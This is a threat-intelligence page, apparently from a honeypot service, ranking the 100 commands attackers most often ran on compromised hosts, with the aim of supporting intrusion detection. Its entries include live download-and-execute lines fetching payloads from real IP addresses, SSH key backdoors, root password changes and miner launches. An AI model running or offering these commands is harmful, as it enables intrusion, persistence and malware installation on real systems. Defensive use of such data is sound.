Updated: December 2025

Top 100 Malicious Commands

The commands attackers execute most often after gaining system access. Useful for intrusion detection and incident response.

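8,710 commands in 24h. Each entry below shows the command, followed by the number of IPs and the execution count (for example, "171 IPs453x" reads as 171 IPs, 453 executions).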
1.
$lockr -ia .ssh
171 IPs453x
2.
$cd ~; chattr -ia .ssh; lockr -ia .ssh
171 IPs453x
3.
$cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
169 IPs449x
4.
$cat /proc/cpuinfo | grep name | wc -l
143 IPs359x
5.
$uname -a
149 IPs358x
6.
$cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
142 IPs355x
7.
$df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
146 IPs355x
8.
$lscpu | grep Model
146 IPs354x
9.
$uname
144 IPs353x
10.
$which ls
142 IPs352x
11.
$ls -lh $(which ls)
142 IPs352x
12.
$whoami
145 IPs352x
13.
$free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
142 IPs352x
14.
$top
142 IPs351x
15.
$crontab -l
141 IPs349x
16.
$uname -m
142 IPs348x
17.
$cat /proc/cpuinfo | grep model | grep name | wc -l
141 IPs347x
18.
$w
140 IPs344x
19.
$Enter new UNIX password:
121 IPs228x
20.
$Enter new UNIX password:
121 IPs228x
21.
$cat /proc/uptime 2 > /dev/null | cut -d. -f1
35 IPs148x
22.
$rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
87 IPs130x
23.
$uname -s -v -n -m 2 > /dev/null
51 IPs122x
24.
$export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc || grep -c "^processor" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version
51 IPs122x
25.
$uname -s -v -n -r -m
21 IPs96x
26.
$uname -m 2 > /dev/null
35 IPs74x
27.
$/bin/./uname -s -v -n -r -m
13 IPs55x
28.
$cd /data/local/tmp/; rm *; busybox wget http://94.154.35.154/arm.uhavenobotsxd; curl http://94.154.35.154/arm.uhavenobotsxd -O; chmod +x arm.uhavenobotsxd; ./arm.uhavenobotsxd android; busybox wget http://94.154.35.154/arm5.uhavenobotsxd; curl http://94.154.35.154/arm5.uhavenobotsxd -O; chmod +x arm5.uhavenobotsxd; ./arm5.uhavenobotsxd android; busybox wget http://94.154.35.154/arm6.uhavenobotsxd; curl http://94.154.35.154/arm6.uhavenobotsxd -O; chmod +x arm6.uhavenobotsxd; ./arm6.uhavenobotsxd
1 IPs32x
29.
$echo SCANNER_TEST
15 IPs18x
30.
$cd /data/local/tmp/; busybox wget http://31.97.147.189/w.sh; sh w.sh; curl http://31.97.147.189/c.sh; sh c.sh; wget http://31.97.147.189/wget.sh; sh wget.sh; curl http://31.97.147.189/wget.sh; sh wget.sh; busybox wget http://31.97.147.189/wget.sh; sh wget.sh; busybox curl http://31.97.147.189/wget.sh; sh wget.sh
2 IPs17x
31.
$uname -s -v -n -r-m
2 IPs12x
32.
$shell
5 IPs10x
33.
$system
5 IPs10x
34.
$cd /data/local/tmp/; busybox wget http://130.12.180.20:36695/w.sh; sh w.sh; curl http://130.12.180.20:36695/c.sh; sh c.sh; wget http://130.12.180.20:36695/wget.sh; sh wget.sh; curl http://130.12.180.20:36695/wget.sh; sh wget.sh; busybox wget http://130.12.180.20:36695/wget.sh; sh wget.sh; busybox curl http://130.12.180.20:36695/wget.sh; sh wget.sh
2 IPs9x
35.
$q
4 IPs8x
36.
$pm path com.ufo.miner
4 IPs7x
37.
$curl2
1 IPs7x
38.
$cat /proc/1/mounts && ls /proc/1/; curl2; ps aux; ps
1 IPs7x
39.
$uname -s -m
7 IPs7x
40.
$rm -rf /data/local/tmp/*
3 IPs7x
41.
$echo "cat /proc/1/mounts && ls /proc/1/; curl2; ps aux; ps" | sh
1 IPs7x
42.
$sh
5 IPs5x
43.
$fi
2 IPs5x
44.
$enable
5 IPs5x
45.
$dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s
4 IPs4x
46.
$cd /data/local/tmp; su 0 mkdir .wws || mkdir .wws; cd .wws; toybox nc 130.12.180.76 3338 > parm7; toybox nc 130.12.180.76 3336 > parm5; toybox nc 130.12.180.76 3337 > parm6; toybox nc 130.12.180.76 3335 > parm; su 0 chmod 777 parm7 parm5 parm6 parm || chmod 777 parm7 parm5 parm6 parm; su 0 ./parm7 arm7; ./parm5; ./parm6; ./parm; su 0 ./parm7 arm5 || ./parm5 arm5 || ./parm6 arm5 || ./parm arm5;
1 IPs4x
47.
$while read i
4 IPs4x
48.
$then
1 IPs4x
49.
$rm .s; exit
4 IPs4x
50.
$Accept-Encoding: gzip
2 IPs4x
51.
$chmod 0755 /data/local/tmp/nohup
2 IPs3x
52.
$am start -n com.ufo.miner/com.example.test.MainActivity
2 IPs3x
53.
$ps | grep trinity
2 IPs3x
54.
$echo SHELL_TEST
2 IPs3x
55.
$nproc
1 IPs2x
56.
$/data/local/tmp/nohup /data/local/tmp/trinity
1 IPs2x
57.
$am start -n com.google.home.tv/com.example.test.MainActivity
1 IPs2x
58.
$chmod 0755 /data/local/tmp/trinity
1 IPs2x
59.
$Accept: */*
1 IPs2x
60.
$rm /data/local/tmp/ufo.apk
2 IPs2x
61.
$rm -f /data/local/tmp/ufo.apk
1 IPs2x
62.
$pm install /data/local/tmp/ufo.apk
1 IPs2x
63.
$lspci | egrep -i nvidia | amd | grep -e VGA -e 3D | wc -l
1 IPs2x
64.
$lspci | egrep -i nvidia|amd | grep -e VGA -e 3D | wc -l
1 IPs2x
65.
$/data/local/tmp/nohup su -c /data/local/tmp/trinity
1 IPs2x
66.
$if [ [ ! -d ${HOME}/.ssh ] ]
1 IPs2x
67.
$ps | grep log
1 IPs2x
68.
$cd /data/local/tmp/; busybox wget http://213.202.211.46/w.sh; sh w.sh; curl http://213.202.211.46/c.sh; sh c.sh; wget http://213.202.211.46/wget.sh; sh wget.sh; curl http://213.202.211.46/wget.sh; sh wget.sh; busybox wget http://213.202.211.46/wget.sh; sh wget.sh; busybox curl http://213.202.211.46/wget.sh; sh wget.sh
1 IPs2x
69.
$else
1 IPs2x
70.
$echo "root:5H2Qyrl6Y2mW"|chpasswd|bash
2 IPs2x
71.
$echo "root:6kzsHk8OZHZa"|chpasswd|bash
2 IPs2x
72.
$if [ 0 -eq 0 ]
1 IPs2x
73.
$ps | grep rig
1 IPs2x
74.
$chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtB
1 IPs2x
75.
$echo "123456\nKdrUwILDULDh\nKdrUwILDULDh\n"|passwd
1 IPs1x
76.
$echo "123456\nHhIwZmxckf0G\nHhIwZmxckf0G\n"|passwd
1 IPs1x
77.
$cat /proc/mounts; /bin/busybox NMYXY
1 IPs1x
78.
$echo "123456\n7oeF57BcCpuc\n7oeF57BcCpuc\n"|passwd
1 IPs1x
79.
$echo "123456\n0sJeGrjeFrAK\n0sJeGrjeFrAK\n"|passwd
1 IPs1x
80.
$cat /proc/mounts; /bin/busybox MKKGO
1 IPs1x
81.
$echo "12345678\nAGIOxFpKmzKc\nAGIOxFpKmzKc\n"|passwd
1 IPs1x
82.
$echo "123123\nvGdjAUCY8Zhg\nvGdjAUCY8Zhg\n"|passwd
1 IPs1x
83.
$cat /proc/mounts; /bin/busybox KUQDM
1 IPs1x
84.
$echo "123123\nRl0K6b9pzdSi\nRl0K6b9pzdSi\n"|passwd
1 IPs1x
85.
$cat /proc/mounts; /bin/busybox KKIVX
1 IPs1x
86.
$Intel Mac OS X 10_15_7
1 IPs1x
87.
$cat /proc/mounts; /bin/busybox BHKVR
1 IPs1x
88.
$echo "1\nr9gdtPvBZ4uN\nr9gdtPvBZ4uN\n"|passwd
1 IPs1x
89.
$chmod 0755 /data/local/tmp/log
1 IPs1x
90.
$echo "1\noF9VyBacMV3f\noF9VyBacMV3f\n"|passwd
1 IPs1x
91.
$echo "1\nnyBg0TzQXueg\nnyBg0TzQXueg\n"|passwd
1 IPs1x
92.
$chmod +x ./.797392456851139211/sshd;nohup ./.797392456851139211/sshd 103.145.145.79 109.176.202.12 101.91.114.194 95.214.181.29 111.203.190.237 122.225.202.150 103.228.170.105 89.169.12.61 101.36.228.201 83.142.209.109 50.6.172.32 82.26.91.241 50.6.4.160 158.51.96.38 115.231.181.61 103.145.145.73 47.100.213.47 115.239.255.196 103.218.243.223 121.137.217.242 177.70.2.194 45.81.23.49 27.148.182.148 156.254.3.130 103.145.145.82 45.129.183.157 106.75.29.239 103.214.112.63 2.189.86.111 123.54.197.60
1 IPs1x
93.
$Chrome/126.0.0.0 Safari/537.36
1 IPs1x
94.
$/data/local/tmp/nohup /data/local/tmp/log
1 IPs1x
95.
$/bin/busybox KKIVX
1 IPs1x
96.
$echo "1\noEqlMcyGVcaw\noEqlMcyGVcaw\n"|passwd
1 IPs1x
97.
$echo "1\nf0FjM6lnFlbn\nf0FjM6lnFlbn\n"|passwd
1 IPs1x
98.
$echo "1\nr6KmVjHZNqig\nr6KmVjHZNqig\n"|passwd
1 IPs1x
99.
$echo "1\nW0jCDx0eKJpP\nW0jCDx0eKJpP\n"|passwd
1 IPs1x
100.
$chmod +x ./.5019559907050924016/sshd;nohup ./.5019559907050924016/sshd 106.13.58.88 156.254.3.130 103.145.145.82 154.211.13.102 60.205.152.248 72.60.102.102 119.96.62.55 36.163.199.18 43.163.220.159 156.238.231.2 179.189.229.2 223.75.204.39 190.123.74.50 8.245.24.52 107.175.159.248 115.50.78.147 103.174.130.65 188.166.211.175 189.230.100.92 8.211.165.95 77.110.112.138 103.145.145.78 39.96.223.182 89.42.199.69 123.178.171.238 138.197.163.192 178.128.253.94 180.163.61.238 151.234.162.15 125.124.10
1 IPs1x

Reconnaissance

uname, whoami, cat /etc/passwd

Download

wget, curl, tftp

Persistence

crontab, chmod, chattr

Lateral Movement

ssh, scp, ping

Detection Use

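These commands can be used to build detection rules for SIEM, IDS/IPS, and monitoring systems. Monitor your logs for these patterns to detect intrusions. Many of the entries (uname, whoami, top, crontab -l) are also routine administrator commands, so rules are more reliable when they match a sequence or context, such as .ssh being removed and authorized_keys rewritten in one line, rather than a single command. Several long entries above are cut off mid-command, so match on the fragments that are shown rather than on the full string.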